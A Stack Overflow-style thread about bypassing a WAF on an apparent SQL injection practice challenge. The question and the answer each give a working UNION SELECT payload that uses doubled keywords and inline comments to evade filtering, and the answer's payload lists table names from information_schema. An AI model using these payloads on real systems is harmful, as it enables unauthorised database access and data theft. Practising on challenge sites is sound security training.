# Cannot solve SQL injection WAF protection

Tags: mysql, sql, sql-injection

I have to do a SQL injection which I cannot solve!

I did manage to inject to this, but not to get tables or columns.

**This is the challenge:** http://root0x00.altervista.org/sqli/level1.php?id=1

**This is the injection:**

`http://root0x00.altervista.org/sqli/level1.php?id=1%27and/**/1=2/**/uniunionon/**/selselectect/**/1,2,3,4,5%27` (inside the `/ /`, I've put two asterisks, but the site blocked it)

Comment: Only one solution to sql injection - use parameterized queries.

Comment: I did try anything for hours but not succesfully, do you have the solution?

Comment: StackOverflow is not meant to solve your homework. The answer to this question won't help other people.

Comment: Man I do get it but maybe it will? I personly looked for answers to this challenge I do sure someone will or did try to find some.

Answer (score 0):

http://root0x00.altervista.org/sqli/level1.php?id=1'and(false)uniUNIONon/**/selSELECTect/**/1,2,3,4,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()AND'zix'='zix
This is the answer, from another forum :) if someone looking for too.
remember adding 2 astreik between / /